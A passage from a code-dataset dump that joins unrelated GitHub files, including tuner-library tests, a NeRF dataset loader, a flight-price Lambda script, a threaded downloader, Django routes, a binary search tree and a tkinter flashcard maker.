rentabilité\", command=self.calculer_rentabilite)\n calculer_rentabilite_btn.pack()\n\n # Comptabilité\n ajouter_operation_btn = ttk.Button(comptabilite_tab, text=\"Ajouter une opération\", command=self.ajouter_operation)\n ajouter_operation_btn.pack()\n modifier_operation_btn = ttk.Button(comptabilite_tab, text=\"Modifier une opération\", command=self.modifier_operation)\n modifier_operation_btn.pack()\n supprimer_operation_btn = ttk.Button(comptabilite_tab, text=\"Supprimer une opération\", command=self.supprimer_operation)\n supprimer_operation_btn.pack()\n","repo_name":"CREUSAT/GI","sub_path":"gestion_immo/app/interface_utilisateur/Interface_Utilisateur.py","file_name":"Interface_Utilisateur.py","file_ext":"py","file_size_in_byte":14373,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41405529494","text":"import pytest\n\nfrom ynca import BandTun\nfrom ynca.subunits.tun import Tun\n\nSYS = \"SYS\"\nSUBUNIT = \"TUN\"\n\nINITIALIZE_FULL_RESPONSES = [\n (\n (SUBUNIT, \"AMFREQ\"),\n [\n (SUBUNIT, \"AMFREQ\", \"1080\"),\n ],\n ),\n (\n (SUBUNIT, \"AVAIL\"),\n [\n (SUBUNIT, \"AVAIL\", \"Ready\"),\n ],\n ),\n (\n (SUBUNIT, \"BAND\"),\n [\n (SUBUNIT, \"BAND\", \"FM\"),\n ],\n ),\n (\n (SUBUNIT, \"FMFREQ\"),\n [\n (SUBUNIT, \"FMFREQ\", \"101.60\"),\n ],\n ),\n (\n (SUBUNIT, \"RDSINFO\"),\n [\n (SUBUNIT, \"RDSPRGTYPE\", \"RDS PRG TYPE\"),\n (SUBUNIT, \"RDSPRGSERVICE\", \"RDS PRG SERVICE\"),\n (SUBUNIT, \"RDSTXTA\", \"RDS RADIO TEXT A\"),\n (SUBUNIT, \"RDSTXTB\", \"RDS RADIO TEXT B\"),\n (SUBUNIT, \"RDSCLOCK\", \"RDS CLOCK\"),\n ],\n ),\n (\n (SYS, \"VERSION\"),\n [\n (SYS, \"VERSION\", \"Version\"),\n ],\n ),\n]\n\n\n@pytest.fixture\ndef initialized_tun(connection) -> Tun:\n connection.get_response_list = INITIALIZE_FULL_RESPONSES\n tun = Tun(connection)\n tun.initialize()\n return tun\n\n\ndef test_initialize(connection, update_callback):\n\n connection.get_response_list = INITIALIZE_FULL_RESPONSES\n\n tun = Tun(connection)\n tun.register_update_callback(update_callback)\n\n tun.initialize()\n\n assert tun.band is BandTun.FM\n assert tun.amfreq == 1080\n assert tun.fmfreq == 101.60\n\n\ndef test_am(connection, initialized_tun: Tun):\n\n initialized_tun.band = BandTun.AM\n connection.put.assert_called_with(SUBUNIT, \"BAND\", \"AM\")\n\n # Set value and test stepsize handling (which is why it becomes 1000)\n initialized_tun.amfreq = 999\n connection.put.assert_called_with(SUBUNIT, \"AMFREQ\", \"1000\")\n\n\ndef test_fm(connection, initialized_tun: Tun):\n\n initialized_tun.band = BandTun.FM\n connection.put.assert_called_with(SUBUNIT, \"BAND\", \"FM\")\n\n # Set value and test stepsize handling (which is why it becomes 100.00)\n initialized_tun.fmfreq = 100.05\n connection.put.assert_called_with(SUBUNIT, \"FMFREQ\", \"100.00\")\n\n\ndef test_rds(connection, initialized_tun: Tun):\n\n # Updates from device\n connection.send_protocol_message(SUBUNIT, \"RDSPRGSERVICE\", \"rds prg service\")\n assert initialized_tun.rdsprgservice == \"rds prg service\"\n\n connection.send_protocol_message(SUBUNIT, \"RDSPRGTYPE\", \"rds prg type\")\n assert initialized_tun.rdsprgtype == \"rds prg type\"\n\n connection.send_protocol_message(SUBUNIT, \"RDSTXTA\", \"radiotext a\")\n assert initialized_tun.rdstxta == \"radiotext a\"\n\n connection.send_protocol_message(SUBUNIT, \"RDSTXTB\", \"radiotext b\")\n assert initialized_tun.rdstxtb == \"radiotext 
b\"\n","repo_name":"mvdwetering/ynca","sub_path":"tests/test_tun.py","file_name":"test_tun.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"21850372657","text":"import jittor as jt\nfrom jittor import nn\nfrom jittor.dataset import Dataset\nimport numpy as np\nfrom ImageEncoder import ImageEncoder\n\n\ndef sample_rays_np(H, W, f, c2w):\n i, j = np.meshgrid(np.arange(W, dtype=np.float32), np.arange(H, dtype=np.float32), indexing='xy')\n dirs = np.stack([(i - W * .5 + 0.5) / f, -(j - H * .5 + 0.5) / f, -np.ones_like(i)], -1)\n rays_d = np.sum(dirs[..., None, :] * c2w[:3, :3], -1)\n rays_o = np.broadcast_to(c2w[:3, -1], np.shape(rays_d))\n return rays_o, rays_d\n\n\ndef get_dataset(data_dir, n, is_shuffle=False):\n data = np.load(data_dir)\n images = data['images']\n poses = data['poses']\n focal = data['focal']\n train_list = shuffle_id(images.shape[0], n, is_shuffle)\n H, W = images.shape[1:3]\n rays = create_ray_batches(images, poses, train_list, H, W, focal)\n\n train_images = jt.array(images[train_list]).permute(0, 3, 1, 2)\n encoder = ImageEncoder()\n encoder.eval()\n with jt.no_grad():\n reference_feature = encoder(train_images)\n # print(reference_feature.shape, reference_feature.sum(2).sum(2))\n # exit()\n # reference_feature => tensor(n, 512, 50, 50)\n return RaysDataset(rays), ReferenceDataset(reference_feature, poses[train_list], focal, H)\n\ndef shuffle_id(n, k, is_shuffle=False):\n train_list = np.arange(n)\n if is_shuffle:\n np.random.shuffle(train_list)\n train_list = train_list[:k]\n return train_list\n\n\ndef create_ray_batches(images, poses, train_list, H, W, f):\n print(\"Create Ray batches!\")\n rays_o_list = list()\n rays_d_list = list()\n rays_rgb_list = list()\n for i in train_list:\n img = images[i]\n pose = poses[i]\n rays_o, rays_d = sample_rays_np(H, W, f, pose)\n rays_o_list.append(rays_o.reshape(-1, 3))\n rays_d_list.append(rays_d.reshape(-1, 3))\n rays_rgb_list.append(img.reshape(-1, 3))\n rays_o_npy = np.concatenate(rays_o_list, axis=0)\n rays_d_npy = np.concatenate(rays_d_list, axis=0)\n rays_rgb_npy = np.concatenate(rays_rgb_list, axis=0)\n rays = jt.array(np.concatenate([rays_o_npy, rays_d_npy, rays_rgb_npy], axis=1))\n return rays\n\n\nclass RaysDataset(Dataset):\n def __init__(self, rays):\n super().__init__()\n self.rays = rays\n\n def __len__(self):\n return self.rays.shape[0]\n\n def __getitem__(self, idx):\n return self.rays[idx]\n\n\nclass ReferenceDataset:\n def __init__(self, reference, c2w, f, img_size):\n self.reference = reference\n self.scale = (img_size / 2) / f\n self.n = c2w.shape[0]\n self.R_t = jt.array(c2w[:, :3, :3]).permute(0, 2, 1)\n self.camera_pos = jt.array(c2w[:, :3, -1])\n self.c2w = c2w\n self.img_size = img_size\n self.f = f\n\n @jt.no_grad()\n def feature_matching(self, pos):\n n_rays, n_samples, _ = pos.shape\n pos = pos.unsqueeze(dim=0).expand([self.n, n_rays, n_samples, 3])\n camera_pos = self.camera_pos[:, None, None, :]\n camera_pos = camera_pos.expand_as(pos)\n ref_pos = jt.linalg.einsum(\"kij,kbsj->kbsi\", self.R_t, pos-camera_pos)\n uv_pos = ref_pos[..., :-1] / ref_pos[..., -1:] / self.scale\n uv_pos[..., 1] *= -1.0\n return nn.grid_sample(self.reference, uv_pos, align_corners=True, 
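# (Clarifying note) grid_sample expects sampling coordinates normalized to\n # [-1, 1], which is what the perspective divide and the division by scale\n # above produce; border padding clamps rays that project outside the\n # reference image to its edge features instead of returning zeros.\n 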
padding_mode=\"border\")\n\n","repo_name":"Jittor/JNeRF","sub_path":"contrib/pixelnerf/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":596,"dataset":"github-code","pt":"21"} +{"seq_id":"36588885525","text":"from get_prices import Get_Prices\r\nfrom datetime import datetime, date, time, timedelta\r\nfrom expertflyer import ExpertFlyer\r\nimport random, re, csv, pytz, time_zone, json, boto3, contextlib\r\nfrom typing import List, Dict\r\n\r\n\r\nprice_getter = Get_Prices(is_lamda=True)\r\n\r\n\r\n\r\ndef get_prices_and_seats(flights: List) -> List[List[Dict[str, str]]]:\r\n \"\"\"\r\n Get the prices and booking classes from a list of flights.\r\n \"\"\"\r\n airlines = [\"UA\", \"FR\", \"DL\", \"WN\"]\r\n airports = get_all_airports()\r\n prices_and_seats = []\r\n\r\n for flight in flights:\r\n airline = flight[\"flight\"].replace(\" \",\"\")[:2]\r\n if airline not in airlines:\r\n continue\r\n\r\n try:\r\n time_zone_of_depart_airport = pytz.timezone(airports[flight[\"depart_airport\"]])\r\n except KeyError:\r\n continue\r\n\r\n current_time_and_date = datetime.now(time_zone_of_depart_airport)\r\n current_time = current_time_and_date.time()\r\n current_time = datetime.combine(date.min, current_time) - datetime.min\r\n current_date = current_time_and_date.date()\r\n\r\n depart_time = flight[\"depart_time\"]\r\n depart_time = datetime.strptime(depart_time, \"%I:%M %p\").time()\r\n depart_time = datetime.combine(date.min, depart_time) - datetime.min\r\n\r\n\r\n if flight[\"frequency\"] != \"Daily\":\r\n parsed_frequency = flight[\"frequency\"].split(\",\")\r\n time_differences = []\r\n for frequency in parsed_frequency:\r\n diff_bw_today_and_flight_day = time_zone.time_between_given_date_and_next_weekday(time_zone.weekdays[frequency], current_date, time_zone_of_depart_airport)\r\n time_till_flight = (diff_bw_today_and_flight_day - current_time) + depart_time\r\n time_differences.append(time_till_flight.total_seconds())\r\n\r\n index_of_least_difference = time_differences.index(min(time_differences))\r\n time_to_departure = time_differences[index_of_least_difference]\r\n date_of_departure = time_zone.get_next_weekday(time_zone.weekdays[parsed_frequency[index_of_least_difference]], time_zone_of_depart_airport)\r\n else:\r\n time_to_departure = depart_time - current_time\r\n time_to_departure = time_to_departure.total_seconds()\r\n date_of_departure = current_time_and_date.date()\r\n\r\n date_str = date_of_departure.strftime(\"%Y-%m-%d\")\r\n\r\n bracket_free_flight_name = re.sub(r\"[\\(\\[].*?[\\)\\]]\", \"\", flight[\"flight\"])\r\n try:\r\n if 0 < time_to_departure < 6 * 3600:\r\n price_and_classes = price_getter.get_flight_prices_online_specific(airline, bracket_free_flight_name.replace(\" \",\"\"), flight[\"depart_airport\"], flight[\"arriving_airport\"], date_str)\r\n print(price_and_classes, flight[\"flight\"])\r\n prices_and_seats.extend(price_and_classes)\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\n return prices_and_seats\r\n\r\n\r\n\r\n\r\n'''\r\nLoads all airports from a CSV stored in S3 in folder script-data/\r\n'''\r\ndef get_all_airports() -> List:\r\n # These airports should be loaded from S3, for now I'm just hard coding some for testing\r\n airports = {}\r\n with open('/home/zain/Documents/airline_stats.csv') as fileObject:\r\n next(fileObject)\r\n reader_obj = csv.reader(fileObject)\r\n for row in reader_obj:\r\n airports[row[0]] = row[1]\r\n return airports\r\n\r\ndef 
get_all_flights() -> List:\r\n print(\"Getting all flights\")\r\n\r\n airports = get_all_airports()\r\n expertflyer = ExpertFlyer()\r\n flights = []\r\n for airport in airports:\r\n timetables = expertflyer.flight_timetables_from_airport(airport)\r\n flights.extend(timetables)\r\n data = json.dumps(timetables)\r\n with open(\"flights.json\", \"a\") as fp:\r\n fp.write(data)\r\n return flights\r\n\r\n'''\r\nStores all the flights in S3 in a folder called script-data/\r\n'''\r\ndef store_flights(flights):\r\n pass\r\n\r\n\r\n'''\r\nLoads the flights a folder script-data in S3\r\n'''\r\ndef load_flights():\r\n flights = None\r\n return flights\r\n\r\n'''\r\nStores the prices_and_seats data to S3 in raw-data/api/\r\n'''\r\ndef store_prices_and_seats(prices_and_seats):\r\n with open(\"prices_classes.json\", \"w\") as fp:\r\n fp.write(json.dumps(prices_and_seats))\r\n\r\ndef handle_errors(exception):\r\n subject = \"ERROR in META script\"\r\n body = str(exception)\r\n # Connect to AWS SES and send an email to \"johan.land@gmail.com\" with the subject and body above\r\n\r\n sender_email = 'johan.land@gmail.com'\r\n ses = boto3.client('ses')\r\n\r\n ses.send_email(\r\n Source=sender_email,\r\n Destination={\r\n \"ToAddresses\": [\"gachhadar.anand@gmail.com\", \"johan.land@gmail.com\"]\r\n },\r\n Message={\r\n 'Subject': {\r\n 'Data': subject,\r\n 'Charset': 'UTF-8'\r\n },\r\n 'Body': {\r\n 'Text': {\r\n 'Data': body,\r\n 'Charset': 'UTF-8'\r\n }\r\n }\r\n }\r\n )\r\n\r\ndef lambda_handler(event, context):\r\n #try:\r\n\r\n if event[\"action\"] == \"GetAllFlights\":\r\n flights = get_all_flights()\r\n store_flights(flights)\r\n elif event[\"action\"] == \"GetPricesAndSeats\":\r\n #flights = load_flights()\r\n #flights = get_all_flights()\r\n with open(\"flights.json\") as fp:\r\n airport_flights = json.loads(fp.read())\r\n\r\n prices = []\r\n for flight in airport_flights:\r\n data = get_prices_and_seats(flight)\r\n prices.append(data)\r\n store_prices_and_seats(prices)\r\n else:\r\n print(\"Bad action\")\r\n return {\r\n 'statusCode': 202,\r\n 'body': \"Error: Bad action\"\r\n }\r\n\r\n return {\r\n 'statusCode': 200,\r\n 'body': \"Completed Successfully.\"\r\n }\r\n '''\r\n except Exception as e:\r\n handle_errors(e)\r\n return {\r\n 'statusCode': 202,\r\n 'body': \"Error.\"\r\n }\r\n '''\r\n\r\n#lambda_handler({\"action\":\"GetAllFlights\"}, None)\r\nlambda_handler({\"action\":\"GetPricesAndSeats\"}, None)\r\n","repo_name":"abdulzain6/Airline-DataProcessing","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"72791829174","text":"import urllib3\nimport time\nfrom threading import Thread\nimport threading\n\nurllib3.disable_warnings()\n\nclass TestThread(Thread):\n def __init__(self, file_name, url):\n Thread.__init__(self, name=file_name)\n self.file_name = file_name\n self.url = url\n\n # the run method will automatically be run in a new thread every time\n def run(self):\n time.sleep(1)\n\n curr_thread = threading.currentThread()\n print(f\"State of thread { curr_thread.name } in run: { repr(curr_thread) }. Is the Thread alive? 
{ curr_thread.isAlive() }\")\n\n print(f\"Downloading the contents of { self.url } into { self.file_name } from { threading.currentThread().name }\")\n http = urllib3.PoolManager()\n\n response = http.request(method=\"GET\", url=self.url)\n with open(self.file_name, \"wb\") as f:\n f.write(response.data)\n\n print(f\"Download of { self.url } done\")\n\n\nif __name__ == \"__main__\":\n test_dict = {\n \"Google\": \"http://www.google.com\",\n # \"Python\": \"http://www.python.org\",\n \"Bing\": \"http://www.bing.com\",\n # \"Yahoo\": \"http://www.yahoo.com\"\n }\n for key in test_dict:\n test = TestThread(key, test_dict[key])\n test.start()\n\n\n\n\"\"\"\nDoing it the function way\n\n\ndef run_in_a_thread():\n print(\"Name of the current thread is {}\".format(threading.current_thread().name))\n\nif __name__ == \"__main__\":\n\n for i in range(2):\n new_thread = Thread(target=run_in_a_thread)\n new_thread.start()\n\n\n\"\"\"","repo_name":"Xceptions/python-distributed-and-concurrent-programming","sub_path":"run_thread.py","file_name":"run_thread.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24796213262","text":"from django.urls import path\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom .views import UserListView, UserchangeListView, AccountCreate, SignUp, Friendspay, abheben, RequestforAccount\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n path('', (UserListView.as_view(template_name='bankaccoount_list.html')), name='article-list'),\n path('change/', (UserchangeListView.as_view(template_name='change_list.html')), name='article-list'),\n path('user/einzahlen/', AccountCreate.as_view(), name='create_account'),\n path('user/friendspay/', Friendspay.as_view(template_name='user_friendspay.html', success_url=\"/\"), name='friendspay'),\n path('mitarbeiter/einzahlungen/', AccountCreate.as_view(), name='create_account'),\n path('mitarbeiter/bankeröffnung/', (AccountCreate.as_view(template_name='mitarbeiter_bankeröffnung.html', success_url=\"/app/\")), name='Bankaccounteröffnung'),\n path('mitarbeiter/accounteröffnen/', (SignUp.as_view(template_name='mitarbeit_accounteröffnen.html', success_url=\"/app/\")), name='Kontoeröffnen'),\n path('user/friendspay/error_blance/', TemplateView.as_view(template_name='balance_low.html')),\n path('user/friendspay/same_account/', TemplateView.as_view(template_name='same_account.html')),\n path('user/request/', RequestforAccount.as_view(template_name='user_request_account.html', success_url=\"/\"), name='request'),\n]","repo_name":"etiiiR/Project_M183","sub_path":"Moneyshare/bankaccount/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30121361565","text":"from pprint import pformat\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n def __repr__(self):\n from pprint import pprint\n if self.left is None and self.right is None:\n return str(self.val)\n return pformat({self.val: {'left': self.left, 'right': self.right}})\n\n def __str__(self):\n return str(self.val)\n\nclass BinarySearchTree:\n def __init__(self, root = None) -> None:\n self.root = root\n\n def insert(self, val):\n if self.root is None:\n self.root = Node(val)\n else:\n self.__insert(val, self.root)\n\n def __insert(self, val, node):\n if val < node.val:\n 
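# (Clarifying note) keys smaller than the current node descend left; equal\n # keys fall through to the else-branch and land in the right subtree, so\n # duplicates are stored right-leaning.\n 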
if node.left is None:\n node.left = Node(val)\n else:\n self.__insert(val, node.left)\n else:\n if node.right is None:\n node.right = Node(val)\n else:\n self.__insert(val, node.right)\n\n def search(self, val):\n if self.root is None:\n return False\n return self.__search(val, self.root)\n\n def __search(self, val, node):\n if node is None:\n return False\n if node.val == val:\n return True\n if val < node.val:\n return self.__search(val, node.left)\n else:\n return self.__search(val, node.right)\n\n def delete(self, val):\n if self.root is None:\n return False\n return self.__delete(val, self.root)\n\n def __delete(self, val, node):\n if node is None:\n return False\n if val < node.val:\n node.left = self.__delete(val, node.left)\n elif val > node.val:\n node.right = self.__delete(val, node.right)\n else:\n if node.left is None:\n return node.right\n elif node.right is None:\n return node.left\n else:\n node.val = self.__find_min(node.right)\n return node\n\n def __find_min(self, node):\n if node.left is None:\n return node.val\n return self.__find_min(node.left)\n\n def __str__(self):\n return str(self.root)\n\n def get_max(self, node=None):\n if node is None:\n node = self.root\n if node.right is None:\n return node.val\n return self.get_max(node.right)\n\n def get_min(self, node=None):\n if node is None:\n node = self.root\n if node.left is None:\n return node.val\n return self.get_min(node.left)\n\n def preorder_traverse(self, node):\n if node is not None:\n yield node\n yield from self.preorder_traverse(node.left)\n yield from self.preorder_traverse(node.right)\n\n def inorder_traverse(self, node):\n if node is not None:\n yield from self.inorder_traverse(node.left)\n yield node\n yield from self.inorder_traverse(node.right)\n\n def postorder_traverse(self, node):\n if node is not None:\n yield from self.postorder_traverse(node.left)\n yield from self.postorder_traverse(node.right)\n yield node\n\n def inorder(self, arr: list, node: Node):\n if node is not None:\n self.inorder(arr, node.left)\n arr.append(node.val)\n self.inorder(arr, node.right) \n\n def find_kth_largest(self, k):\n arr = []\n self.inorder(arr, self.root)\n return arr[-k]\n\n def find_kth_smallest(self, k):\n arr = []\n self.inorder(arr, self.root)\n return arr[k-1]\n\ndef postorder(curr_node):\n node_list = []\n if curr_node is not None:\n node_list.extend(postorder(curr_node.left))\n node_list.extend(postorder(curr_node.right))\n node_list.append(curr_node.val)\n return node_list\n\ndef binary_search_tree():\n # None marks a missing node in the level-order list; comparing it with\n # ints would raise TypeError, so skip it instead of inserting it\n testList = [5, 3, 6, 2, 4, None, 7]\n t = BinarySearchTree()\n for i in testList:\n if i is not None:\n t.insert(i)\n\n print(t)\n\n if t.search(3):\n print(\"Found\")\n else:\n print(\"Not Found\")\n\n t.delete(3)\n print(t)\n\n print(t.get_max())\n print(t.get_min())\n\n print(t.find_kth_largest(2))\n print(t.find_kth_smallest(2))\n\n print(list(t.preorder_traverse(t.root)))\n print(list(t.inorder_traverse(t.root)))\n print(list(t.postorder_traverse(t.root)))\n\n print(postorder(t.root))\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n\n #binary_search_tree()\n","repo_name":"DavidZhiXing/Blog","sub_path":"leetcode/python/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"72627229493","text":"import tkinter as tk\r\nfrom tkinter.filedialog import askdirectory\r\nimport tkinter.messagebox\r\nimport os.path\r\n#fcInfoFrm - .pack(expand = 
True)\r\ndef browseForPath():\r\n fcPathEnt.delete(0, tk.END)\r\n fcPathEnt.insert(0, tk.filedialog.askdirectory(title = \"Choose save location\", initialdir = \"..\"))\r\n\r\ndef nfRunFlash():\r\n import runFlash\r\n runFlash.runFlashCards(False,txtFilePath)\r\n \r\ndef handleButton(hbBtn):\r\n #Save current card\r\n getQVal = cnqTxtQ.get(\"1.0\", \"end-1c\")\r\n getAVal = cnqTxtA.get(\"1.0\", \"end-1c\")\r\n qList[cardInfo[1]] = [getQVal, getAVal]\r\n #Handle the button request\r\n if hbBtn == 0:\r\n cardInfo[0] += 1\r\n cardInfo[1] += 1\r\n cardInfo[2] += 1\r\n qList.insert(cardInfo[1],[])\r\n canNumber = str(cardInfo[0]) + \"/\" + str(cardInfo[2])\r\n createAddNum.config(text= canNumber)\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n elif hbBtn == 1:\r\n if cardInfo[0] == 1:\r\n False\r\n else:\r\n cardInfo[0] -= 1\r\n cardInfo[1] -= 1\r\n canNumber = str(cardInfo[0]) + \"/\" + str(cardInfo[2])\r\n createAddNum.config(text= canNumber)\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n cnqTxtQ.insert(1.0, qList[cardInfo[1]][0])\r\n cnqTxtA.insert(1.0, qList[cardInfo[1]][1])\r\n elif hbBtn == 2:\r\n cardInfo[0] += 1\r\n cardInfo[1] += 1\r\n canNumber = str(cardInfo[0]) + \"/\" + str(cardInfo[2])\r\n createAddNum.config(text= canNumber)\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n cnqTxtQ.insert(1.0, qList[cardInfo[1]][0])\r\n cnqTxtA.insert(1.0, qList[cardInfo[1]][1])\r\n elif hbBtn == 3:\r\n if cardInfo[0] != 1:\r\n qList.pop(cardInfo[1])\r\n cardInfo[0] -= 1\r\n cardInfo[1] -= 1\r\n cardInfo[2] -= 1\r\n canNumber = str(cardInfo[0]) + \"/\" + str(cardInfo[2])\r\n createAddNum.config(text= canNumber)\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n cnqTxtQ.insert(1.0, qList[cardInfo[1]][0])\r\n cnqTxtA.insert(1.0, qList[cardInfo[1]][1])\r\n else:\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n elif hbBtn == 4:\r\n finishCont = tk.messagebox.askokcancel(\"Are you finished?\", \"Do you want to finish?\")\r\n if finishCont == True:\r\n iterNumber = 1\r\n txtFileName = \"\".join(scTitle.split()).lower()\r\n global txtFilePath\r\n txtFilePath = os.path.join(scFileDir, txtFileName + \".txt\")\r\n writeFile = open(txtFilePath, \"w\")\r\n infoLnJoin = [str(cardInfo[2]), scTitle]\r\n infoLn = \";\".join(infoLnJoin) + \"\\n\"\r\n writeFile.write(infoLn)\r\n for lines in qList:\r\n lines.insert(0,str(iterNumber))\r\n writeFile.write(\";\".join(lines)+\"\\n\")\r\n iterNumber += 1\r\n createFrm.pack_forget()\r\n scsFrm = tk.Frame(root, bg = \"white\")\r\n scsFrm.pack(expand = True)\r\n scsLab = tk.Label(scsFrm, text = \"Flashcards created successfully\", font = (\"Courier New\", \"20\"), wraplength = 400, bg = \"white\")\r\n scsLab.pack()\r\n scsBtn = tk.Button(scsFrm, text = \"Use flashcards\", command = nfRunFlash, bg = \"white\",relief = \"solid\", font = (\"Courier New\", \"10\"))\r\n scsBtn.pack(pady = 10)\r\n else:\r\n False\r\n else:\r\n tk.messagebox.showerror(\"Internal error\", \"An internal error occured\")\r\n #Check button enable/disable\r\n if cardInfo[2] != 1:\r\n createAddPrev.config(state=\"normal\")\r\n else:\r\n createAddPrev.config(state=\"disabled\")\r\n if cardInfo[2] != cardInfo[0]:\r\n createAddNext.config(state=\"normal\")\r\n else:\r\n createAddNext.config(state=\"disabled\")\r\n \r\ndef showCreationFrame():\r\n global qList, cardInfo, createFrm\r\n #List of question in format [[\"question\", \"answer\"],[\"question\", \"answer\"]]\r\n qList = [[]]\r\n #Card number, list 
index, total cards\r\n #Only change total cards in add and delete\r\n cardInfo = [1,0,1]\r\n #Main question frame\r\n createFrm = tk.Frame(root, bg = \"white\")\r\n createFrm.pack(expand = True)\r\n \r\n createTitleLab = tk.Label(createFrm, text = \"Create new flashcards\", font = (\"Courier New\", \"20\"), bg = \"white\")\r\n createTitleLab.pack(pady = 10, anchor = \"w\")\r\n\r\n #Create question entry area\r\n cnqFrm = tk.Frame(createFrm, bg = \"white\")\r\n cnqFrm.pack()\r\n\r\n #Question entry\r\n cnqLabQ = tk.Label(cnqFrm, text = \"Question\", bg = \"white\", font = (\"Courier New\", \"12\"))\r\n cnqLabQ.grid(column = 0, row = 0)\r\n #Frame for question Text\r\n cnqTxtQFrm = tk.Frame(cnqFrm, height = 70, width = 150, bg = \"white\")\r\n cnqTxtQFrm.grid(column = 0, row = 1, padx = 10)\r\n cnqTxtQFrm.pack_propagate(False)\r\n #Question Text\r\n global cnqTxtQ\r\n cnqTxtQ = tk.Text(cnqTxtQFrm, relief = \"solid\", wrap=tk.WORD)\r\n cnqTxtQ.pack()\r\n\r\n #Answer entry\r\n cnqLabA = tk.Label(cnqFrm, text = \"Answer\", bg = \"white\", font = (\"Courier New\", \"12\"))\r\n cnqLabA.grid(column = 1, row = 0)\r\n #Frame for answer text\r\n cnqTxtAFrm = tk.Frame(cnqFrm, height = 70, width = 150, bg = \"white\")\r\n cnqTxtAFrm.grid(column = 1, row = 1, padx = 20)\r\n cnqTxtAFrm.pack_propagate(False)\r\n #Answer Text\r\n global cnqTxtA\r\n cnqTxtA = tk.Text(cnqTxtAFrm, relief = \"solid\", wrap=tk.WORD)\r\n cnqTxtA.pack()\r\n\r\n #Controls\r\n createQFrm = tk.Frame(createFrm, bg = \"white\")\r\n createQFrm.pack(pady = 10)\r\n createCreateBtn = tk.Button(createQFrm, text = \"+\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(0), font = (\"Courier New\", \"10\"))\r\n createCreateBtn.grid(column = 0, row = 0, padx = 10)\r\n global createAddPrev\r\n createAddPrev = tk.Button(createQFrm, text = \"<\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(1), state = \"disabled\", font = (\"Courier New\", \"10\"))\r\n createAddPrev.grid(column = 1, row = 0)\r\n global createAddNum\r\n createAddNum = tk.Label(createQFrm, text = \"1/1\", bg = \"white\", font = (\"Courier New\", \"10\"))\r\n createAddNum.grid(column = 2, row = 0)\r\n global createAddNext\r\n createAddNext = tk.Button(createQFrm, text = \">\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(2), state = \"disabled\", font = (\"Courier New\", \"10\"))\r\n createAddNext.grid(column = 3, row = 0)\r\n createAddBtn = tk.Button(createQFrm, text = \"Delete\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(3), font = (\"Courier New\", \"10\"))\r\n createAddBtn.grid(column = 4, row = 0, pady = 10, padx = 20)\r\n createFinishBtn = tk.Button(createQFrm, text = \"Finish\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(4), font = (\"Courier New\", \"10\"))\r\n createFinishBtn.grid(column = 5, row = 0)\r\n \r\n \r\ndef startCreation():\r\n global scTitle, scFileDir\r\n if len(fcTitleEnt.get()) != 0 and len(fcPathEnt.get()) and os.path.exists(fcPathEnt.get()):\r\n scTitle = fcTitleEnt.get()\r\n scFileDir = fcPathEnt.get()\r\n fcInfoFrm.pack_forget()\r\n showCreationFrame()\r\n else:\r\n tk.messagebox.showerror(\"Error\", \"Fill in all fields\")\r\n\r\ndef createGUI():\r\n global fcInfoFrm, fcTitleEnt, fcPathEnt, root\r\n root = tk.Tk()\r\n root.title(\"Flashcard creator\")\r\n root.geometry(\"500x250\")\r\n root.config(bg = \"white\")\r\n root.lift()\r\n \r\n fcInfoFrm = tk.Frame(root, bg = \"white\")\r\n fcInfoFrm.pack(expand = True)\r\n\r\n fcCreateLab = 
tk.Label(fcInfoFrm, text = \"Create new flashcards\", font = (\"Courier New\", \"20\"), bg = \"white\")\r\n fcCreateLab.pack(pady = 10, anchor = \"w\")\r\n\r\n fcTitleLab = tk.Label(fcInfoFrm, text=\"Title\", bg = \"white\", font = (\"Courier New\", \"10\"))\r\n fcTitleLab.pack(anchor = \"w\")\r\n fcTitleEnt = tk.Entry(fcInfoFrm, width = 40, relief = \"solid\", font = (\"Courier New\", \"10\"))\r\n fcTitleEnt.pack(pady = (0,10), anchor = \"w\")\r\n\r\n fcPathFrm = tk.Frame(fcInfoFrm, bg = \"white\")\r\n fcPathFrm.pack(anchor = \"w\")\r\n fcPathLab = tk.Label(fcPathFrm, text=\"Save location\", bg = \"white\", highlightthickness=0, font = (\"Courier New\", \"10\"))\r\n fcPathLab.grid(row = 0, column = 0, sticky = \"w\")\r\n fcPathEnt = tk.Entry(fcPathFrm, width = 40, relief = \"solid\", font = (\"Courier New\", \"10\"))\r\n fcPathEnt.grid(row = 1, column = 0, pady = (0, 10))\r\n fcPathBtn = tk.Button(fcPathFrm, text = \"Browse...\", command = browseForPath, relief = \"solid\", bg = \"white\", font = (\"Courier New\", 